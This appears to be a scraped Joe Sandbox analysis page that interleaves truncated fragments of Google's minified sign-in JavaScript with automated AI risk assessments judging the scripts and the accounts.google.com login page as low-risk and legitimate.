var d2a=function(a){_.Kt.call(this);this.aa=a.Fa.jga};_.K(d2a,_.Ku);d2a.Ca=function(){return{Fa:{jga:_.$1a,metadata:_.a2a},preload:{cJ:_.MA}}};d2a.prototype.execute=function(a){a=e2a(this,a);return this.aa.execute(a)};
var e2a=function(a,b){var c={};_.Fb(b,function(d,e){c[e]=d.jb.hc(d.ob);if(d.metadata){if(d.metadata.sideChannel)for(var f=_.n(d.metadata.sideChannel),g=f.next();!g.done;g=f.next())g=g.value,c[e]=_.Vya(c[e],g.extension,g.message);if(d.metadata.kb)for(d=_.n(d.metadata.kb),f=d.next();!f.done;f=d.next())f=f.value,c[e]=_.nm(c[e],f.key,f.value)}},a);return c};_.Ou(_.ima,d2a);
_.l();
}catch(e){_._DumpException(e)}
}).call(this,this.default_AccountsSignInUi);
// Google Inc.
|
| URL: https://www.gstatic.com/_/mss/boq-identity/_/js/k=... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script contains a mix of low-risk and moderate-risk indicators. It uses legacy APIs like `XDomainRequest` and performs external data transmission, which could potentially lead to data exfiltration. However, the script appears to have a legitimate purpose related to analytics and error reporting, and it interacts with trusted domains like `google.com`. Further review may be necessary to determine the full extent of the script's behavior and potential risks."
} |
"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_.Pg(_.Pqa);
_.k("sOXFj");
var Wu=function(){_.Kt.call(this)};_.K(Wu,_.Ku);Wu.Ca=_.Ku.Ca;Wu.prototype.aa=function(a){return a()};_.Ou(_.Oqa,Wu);
_.l();
_.k("oGtAuc");
_.Yya=new _.Df(_.Pqa);
_.l();
_.k("q0xTif");
var Tza=function(a){var b=function(d){_.To(d)&&(_.To(d).Mc=null,_.lv(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(var c=0;c<a.length;c++)b(a[c])};_.wv=function(a,b){a&&_.Ff.hc().register(a,b)};_.xv=function(a){_.kv.call(this,a.La);var b=this,c=a.context.Zga;this.oa=c.Hr;this.kd=this.Pa=this.eb=this.Ba=null;this.Ma=a.Fa.Lc;this.Wa=a.Fa.lpa;a=this.oa.oa.then(function(d){b.Ba=d;d=b.oa.id.Z6(d,b.oa.getParams());b.eb=d.variant});c=c.a2.then(function(d){b.Pa=d});this.Ea=this.Ea.bind(this);this.hj(_.Ni([a,c]))};_.K(_.xv,_.kv);_.xv.Ca=function(){return{context:{Zga:"FVxLkf"},Fa:{Lc:_.Uu,component:_.qv,lpa:_.Yya}}};_.xv.prototype.aa=function(){return""};_.xv.prototype.Da=function(){return!1};
_.xv.prototype.Np=function(){return this.oa};var yv=function(a){var b=_.Fb(a.Pa,a.Ea);b={fb:a.oa.getParams(),Yfa:a.oa.Da,ab:{A6:!1,fb:a.oa.getParams(),Kb:a.oa.id.Ea,BP:a.oa.jJ,Ib:a.aa(),jsdata:_.Gb(a.Ba)},oc:b,Eua:a.eb};Object.assign(b,a.Ba||{});Object.assign(b,a.oa.da);Object.assign(b.ab,a.oa.da);return b};_.xv.prototype.Ea=function(a,b){return Array.isArray(a)?a.length!=1||(b=this.oa.id.getChildren()[b],b&&b.hy)?_.Sf(a,function(c){return yv(c)}):yv(a[0]):yv(a)};_.xv.prototype.fa=function(){return null};
var Uza=function(a){var b=a.da();return function(){var c=_.lb.apply(0,arguments);return a.Wa.aa(function(){return b.apply(null,_.Ph(c))})}},Vza=function(a){var b=a.fa();return b?function(){var c=_.lb.apply(0,arguments);return a.Wa.aa(function(){return b.apply(null,_.Ph(c))})}:b};_.xv.prototype.render=function(){var a=yv(this),b=Uza(this);b=this.Da()?Wza(this,b,a):this.Qa.Bc(b,a);this.fa()&&(a=Xza(this,a),b.appendChild(a));(a=this.oa.id.YU())&&a.length>0&&a.forEach(function(){});this.oa.aa(b);return b};
var Xza=function(a,b){var c=a.dom.aa.aa.createElement("view-header");c.style.display="none";var d=Vza(a);b={fb:a.oa.getParams()};a.Da()?a.Ma.nE(c,d,b):(a=a.Qa.WP(d,b),c.appendChild(a));return c},Wza=function(a,b,c){var d=a.dom.aa.aa.createElement("div");a.Ma.nE(d,b,c);return d.childNodes.length==1?d.firstChild:d};_.xv.prototype.dX=function(a){var b=yv(this),c=Uza(this);Tza(a);this.Ma.Wk(a,c,b);this.Np().aa(a);this.fa()&&(b=Xza(this,b),b=(new _.Cp(b)).Mb(),_.wg(_.zg(a).body,_.Sza,b))};_.wv(_.vv,_.xv);
_.l();
_.TC=function(a){var b=_.D,c=_.tk(a.Ed,15);a=_.U("O",c!=null?c:null)(null,a);return b("<title>"+_.qq(a)+"</title>")};
_.T("La","",0,function(){return _.RC()});
_.T("La","",1,function(a){return a.z6?_.RC():""});
_.k("ZZ4WUe");
var fXa=function(a,b){var c=a.fb,d=_.D;a=a.ab;var e=_.D,f=(0,_.D)(""+_.N(_.ksa())),g=(0,_.D)(""+_.Rq({text:"",jsname:"H5iMZd"},b));c={z6:_.ok(c,1,!0)};c=_.U("La")(c,b);return d(_.KE({ab:a,jscontroller:"eVCnO",jsaction:"jiqeKb:UHZ0U;rcuQ6b:WYd",content:e(""+_.LE({title:"Something went wrong",subtitle:f,Xc:g,Hd:c},b))},b))},gXa=function(a,b){return(0,_.D)(_.TC(b))},ME=function(a){_.xv.call(this,a.La)};_.K(ME,_.xv);ME.Ca=_.xv.Ca;ME.prototype.aa=function(){return"ZZ4WUe"};ME.prototype.da=function(){return fXa};
ME.prototype.fa=function(){return gXa};_.wv(_.LFa,ME);_.ev.ZZ4WUe=_.NFa;
_.l();
}catch(e){_._DumpException(e)}
}).call(this,this.default_AccountsSignInUi);
// Google Inc.
|
| URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9_wStdPSiTfAnvB1dOMLuLGsxOre4QgnQDsthoAyKq75VhKVjbImjTana7iFEeKfDbFJu8SBA&passive=1209600&flowName=GlifW Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email or phone"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.google.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://accounts.google.com |
| URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9_wStdPSiTfAnvB1dOMLuLGsxOre4QgnQDsthoAyKq75VhKVjbImjTana7iFEeKfDbFJu8SBA&passive=1209600&flowName=GlifW Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email or phone"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9_wStdPSiTfAnvB1dOMLuLGsxOre4QgnQDsthoAyKq75VhKVjbImjTana7iFEeKfDbFJu8SBA&passive=1209600&flowName=GlifW Model: Joe Sandbox AI | {
"brands": [
"Google"
]
} |
|
| URL: https://www.gstatic.com/_/mss/boq-identity/_/js/k=... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script contains obfuscated code and URLs, which is a high-risk indicator. However, there are no clear signs of malicious behavior such as data exfiltration or dynamic code execution. The script appears to be related to some form of image loading and event handling, possibly for analytics or telemetry, but lacks transparency. Without further context, it is capped at a low risk score."
} |
"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
var Fua=function(a,b){this.da=a;this.fa=b;if(!c){var c=new _.fg("//www.google.com/images/cleardot.gif");_.Sm(c)}this.oa=c};_.h=Fua.prototype;_.h.kd=null;_.h.m0=1E4;_.h.iC=!1;_.h.XS=0;_.h.hM=null;_.h.eX=null;_.h.setTimeout=function(a){this.m0=a};_.h.start=function(){if(this.iC)throw Error("sc");this.iC=!0;this.XS=0;Gua(this)};_.h.stop=function(){Hua(this);this.iC=!1};
var Gua=function(a){a.XS++;navigator!==null&&"onLine"in navigator&&!navigator.onLine?_.on((0,_.Ng)(a.rJ,a,!1),0):(a.aa=new Image,a.aa.onload=(0,_.Ng)(a.uma,a),a.aa.onerror=(0,_.Ng)(a.tma,a),a.aa.onabort=(0,_.Ng)(a.sma,a),a.hM=_.on(a.vma,a.m0,a),a.aa.src=String(a.oa))};_.h=Fua.prototype;_.h.uma=function(){this.rJ(!0)};_.h.tma=function(){this.rJ(!1)};_.h.sma=function(){this.rJ(!1)};_.h.vma=function(){this.rJ(!1)};
_.h.rJ=function(a){Hua(this);a?(this.iC=!1,this.da.call(this.fa,!0)):this.XS<=0?Gua(this):(this.iC=!1,this.da.call(this.fa,!1))};var Hua=function(a){a.aa&&(a.aa.onload=null,a.aa.onerror=null,a.aa.onabort=null,a.aa=null);a.hM&&(_.pn(a.hM),a.hM=null);a.eX&&(_.pn(a.eX),a.eX=null)};var Iua=function(){_.ln.call(this);this.aa=new Fua(this.yma,this);this.fa=51E3+Math.round(18E3*Math.random())};_.K(Iua,_.ln);_.h=Iua.prototype;_.h.yma=function(a){this.gW=Date.now();this.o5(a)};_.h.o5=function(a){this.Z4=a;this.dispatchEvent("g")};_.h.kd=null;_.h.gW=0;_.h.Z4=!0;var Jua=function(){this.aa=new Iua};_.Se(_.Hn,Jua);_.Cb().hl(function(a){var b=new Jua(a);_.Np(a,_.Hn,b)});
_.k("byfTOb");
_.l();
_.k("lsjVmc");
var qs=function(a,b){b=b===void 0?!0:b;_.oi.call(this);this.Ba=a;this.da=new _.ps(this);b&&_.Kua(this);_.Jg(this,this.da)};_.rs=function(a){this.Ha=_.u(a,0,_.rs.messageId)};_.K(_.rs,_.v);_.rs.prototype.ty=_.ba(41);_.rs.messageId="xsrf";_.Lua=new _.Zk(48448350,_.rs);_.ni(qs,_.oi);qs.prototype.aa=null;qs.prototype.fa="at";qs.prototype.oa=null;_.Kua=function(a){var b=a.Ba.get(_.Zl);b.Ba.includes(a.da);b.oa(a.da)};qs.prototype.configure=function(a,b,c){this.aa=a;this.oa=b;c&&(this.fa=c)};_.ps=function(a){this.fa=a};_.ni(_.ps,_.Tf);_.ps.prototype.aa=_.ba(15);_.ps.prototype.da=_.ba(18);_.Se(_.In,qs);_.Cb().hl(function(a){var b=new qs(a,!1);_.Np(a,_.In,b);b.configure(_.Le("SNlM0e").string(null),_.Le("S06Grb").string(null))});
_.l();
_.nf.prototype.bO=_.ca(6,function(){return this.ex});_.ss=function(a){var b=a.Xd().bO();if(b==null||b<0)return null;var c=_.Il[b];if(c){var d=Object.values(c)[0],e=_.om(a,_.em);c=_.om(a,_.Gka);var f=_.om(a,_.fm),g=_.om(a,_.gm),m=_.om(a,_.Hka);b=_.Hl[b];a={En:d,Hs:b?Object.values(b)[0]:void 0,request:a.ji(),lD:!!e};f&&(a.H1=f);g&&(a.I1=g);c&&(a.cB=c);m&&(a.eP=m);return a}return(c=_.Jl[b])?(c=Object.values(c)[0],b=_.Kl[b],{En:b?Object.values(b)[0]:void 0,hB:c,wW:a.ji()}):null};
_.Mua=function(a){return _.Fc(function(b){return b instanceof a&&!_.nc(b.Ha)})};_.Nua=function(a,b){a.sort(b||_.Na)};_.ts=function(a,b){b in a&&delete a[b]};_.us=function(a,b){return a!==null&&b in a?a[b]:void 0};_.Rn.prototype.vD=_.ca(21,function(){for(var a={},b=this.getAllResponseHeaders().split("\r\n"),c=0;c<b.length;c++)if(!_.hj(b[c])){var d=_.lka(b[c],":",1),e=d[0];d=d[1];if(typeof d==="string"){d=d.trim();var f=a[e]||[];a[e]=f;f.push(d)}}return _.Fb(a,function(g){return g.join(", ")})});
_.Pn.prototype.Om=_.ca(20,function(){return _.tk(this,3)});_.Oua=function(a,b){return _.xe(a,2,b)};_.Pua=function(a){var b=a.type;if(typeof b==="string")switch(b.toLowerCase()){case "checkbox":case "radio":return a.checked?a.value:null;case "select-one":return b=a.selectedIndex,b>=0?a.options[b].value:null;case "select-multiple":b=[];for(var c,d=0;c=a.options[d];d++)c.selected&&b.push(c.value);return b.length?b:null}return a.value!=null?a.value:null};
_.vs=function(a){_.oi.call(this);this.pb=a;this.oa={}};_.ni(_.vs,_.oi);var Qua=[];_.vs.prototype.listen=function(a,b,c,d){Array.isArray(b)||(b&&(Qua[0]=b.toString()),b=Qua);for(var e=0;e<b.length;e++){var f=_.en(a,b[e],c||this.ha |
| URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9_wStdPSiTfAnvB1dOMLuLGsxOre4QgnQDsthoAyKq75VhKVjbImjTana7iFEeKfDbFJu8SBA&passive=1209600&flowName=GlifW Model: Joe Sandbox AI | {
"brands": [
"Google"
]
} |
|
| URL: https://www.gstatic.com/_/mss/boq-identity/_/js/k=... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script appears to be part of a legitimate library, likely related to Google's Closure Library, as indicated by the copyright notices. It does not exhibit any high-risk behaviors such as dynamic code execution or data exfiltration. The presence of obfuscated variable names is typical for minified code and not inherently malicious. No interactions with external domains or suspicious behaviors are observed."
} |
"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x24cc1989, 0x1be1, 0x1a70ff1, 0x91406f4, 0x3210, 0x0, 0x36000000, 0x32000000, 0x61, ]);
/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright Google LLC
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright 2024 Google, Inc
SPDX-License-Identifier: MIT
*/
/*
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
var baa,daa,Qa,Ua,gaa,iaa,jb,saa,zaa,Ab,Laa,Naa,Qaa,Mb,Raa,Sb,Ub,Vb,Saa,Taa,Xb,Uaa,Vaa,Waa,ac,aba,cba,ic,jc,kc,gba,iba,jba,nba,pba,rba,sba,wba,zba,tba,yba,xba,vba,uba,Aba,Bba,Cba,Jba,Mba,Oba,Pba,Lba,Rba,Oc,Tba,Zba,$ba,aca,bca,cca,dca,Xba,Yba,fca,hca,kca,lca,mca,nca,oca,rca,tca,sca,vca,Ed,Dd,xca,wca,Aca,zca,Cca,Eca,Fca,Hca,Ld,Ica,Jca,Kca,Qd,Qca,Rca,ce,Sca,Pd,Sd,Xca,ne,bda,Wca,cda,eda,fda,ida,lda,mda,nda,qda,Ida,Oda,Pe,Qda,Qe,Rda,Wda,gea,iea,jea,kea,mea,qea,rea,sea,tea,wea,yea,Eea,Iea,Jea,Kea,Oea,Xea,
Tea,$ea,Zea,gg,cfa,jg,efa,ffa,gfa,lfa,qfa,ofa,ufa,vfa,wfa,yfa,zfa,Afa,Dfa,Efa,Kfa,Mfa,Nfa,Ofa,Pfa,Qfa,Rfa,Sfa,Ufa,Vfa,Xfa,aga,bga,dga,bh,ch,iga,kga,lga,mga,nga,pga,dh,rga,sga,fh,tga,uga,vga,yga,zga,Aga,Dga,Ega,Fga,Hga,Lga,Pga,aaa,Uga,Kh,Vga,Mh,Wga,Xga,Yga,Qh,Sh,cha,hha,gha,ci,jha;_.ba=function(a){return function(){return aaa[a].apply(this,arguments)}};_.ca=function(a,b){return aaa[a]=b};_.ha=function(a){_.fa.setTimeout(function(){throw a;},0)};_.ja=function(a){a&&typeof a.dispose=="function"&&a.dispose()};
baa=function(a){for(var b=0,c=arguments.length;b<c;++b){var d=arguments[b];_.ka(d)?baa.apply(null,d):_.ja(d)}};_.la=function(a,b){if(Error.captureStackTrace)Error.captureStackTrace(this,_.la);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));b!==void 0&&(this.cause=b);this.aa=!0};_.ma=function(a){return a[a.length-1]};_.na=function(a,b,c){for(var d=typeof a==="string"?a.split(""):a,e=a.length-1;e>=0;--e)e in d&&b.call(c,d[e],e,a)};
_.pa=function(a,b,c){b=_.oa(a,b,c);return b<0?null:typeof a==="string"?a.charAt(b):a[b]};_.oa=function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)if(f in e&&b.call(c,e[f],f,a))return f;return-1};_.ra=function(a,b){return(0,_.qa)(a,b)>=0};_.sa=function(a){if(!Array.isArray(a))for(var b=a.length-1;b>=0;b--)delete a[b];a.length=0};_.ua=function(a,b){_.ra(a,b)||a.push(b)};_.Ba=function(a,b){b=(0,_.qa)(a,b);var c;(c=b>=0)&&_.wa(a,b);return c};
_.wa=function(a,b){return Array.prototype.splice.call(a,b,1).length==1};_.Ca=function(a){return Array.prototype.concat.apply([],arguments)};_.Da=function(a){var b=a.length;if(b>0){for(var c=Array(b),d=0;d<b;d++)c[d]=a[d];return c}return[]};_.Ea=function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(_.ka(d)){var e=a.length||0,f=d.length||0;a.length=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}};
_.caa=function(a,b,c){return arguments.length<=2?Array.prototype.slice.call(a,b):Array.prototype.slice.call(a,b,c)};_.Ka=function(a,b){b=b||a;for(var c=0,d=0,e={};d<a.length;){var f=a[d++],g=_.Ha(f)?"o"+_.Ja(f):(typeof f).charAt(0)+f;Object.prototype.hasOwnProperty.call(e,g)||(e[g]=!0,b[c++]=f)}b.length=c};_.La=function(a,b){if(!_.ka(a)||!_.ka(b)||a.length!=b.length)return!1;for(var c=a.length,d=daa,e=0;e<c;e++)if(!d(a[e],b[e]))return!1;return!0};_.Na=function(a,b){return a>b?1:a<b?-1:0};
daa=function(a,b){return a===b};_.eaa=function(a,b){var c={};(0,_.Pa)(a,function(d,e){c[b.call(void 0,d,e,a)]=d});return c};Qa=function(a){return a.toString().indexOf("`")===-1};_.Ta=function(a){return new _.Ra(_.Sa,a[0].toLowerCase())};Ua=function(a){return{valueOf:a}.valueOf()};gaa=function(){var a=null;if(!faa)return a;try{var b=function(c){return c};a=faa.createPolicy("AccountsSignInUi#html",{createHTML:b,createScript:b,createS |
Edit tour
chrome.exe (PID: 7044 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node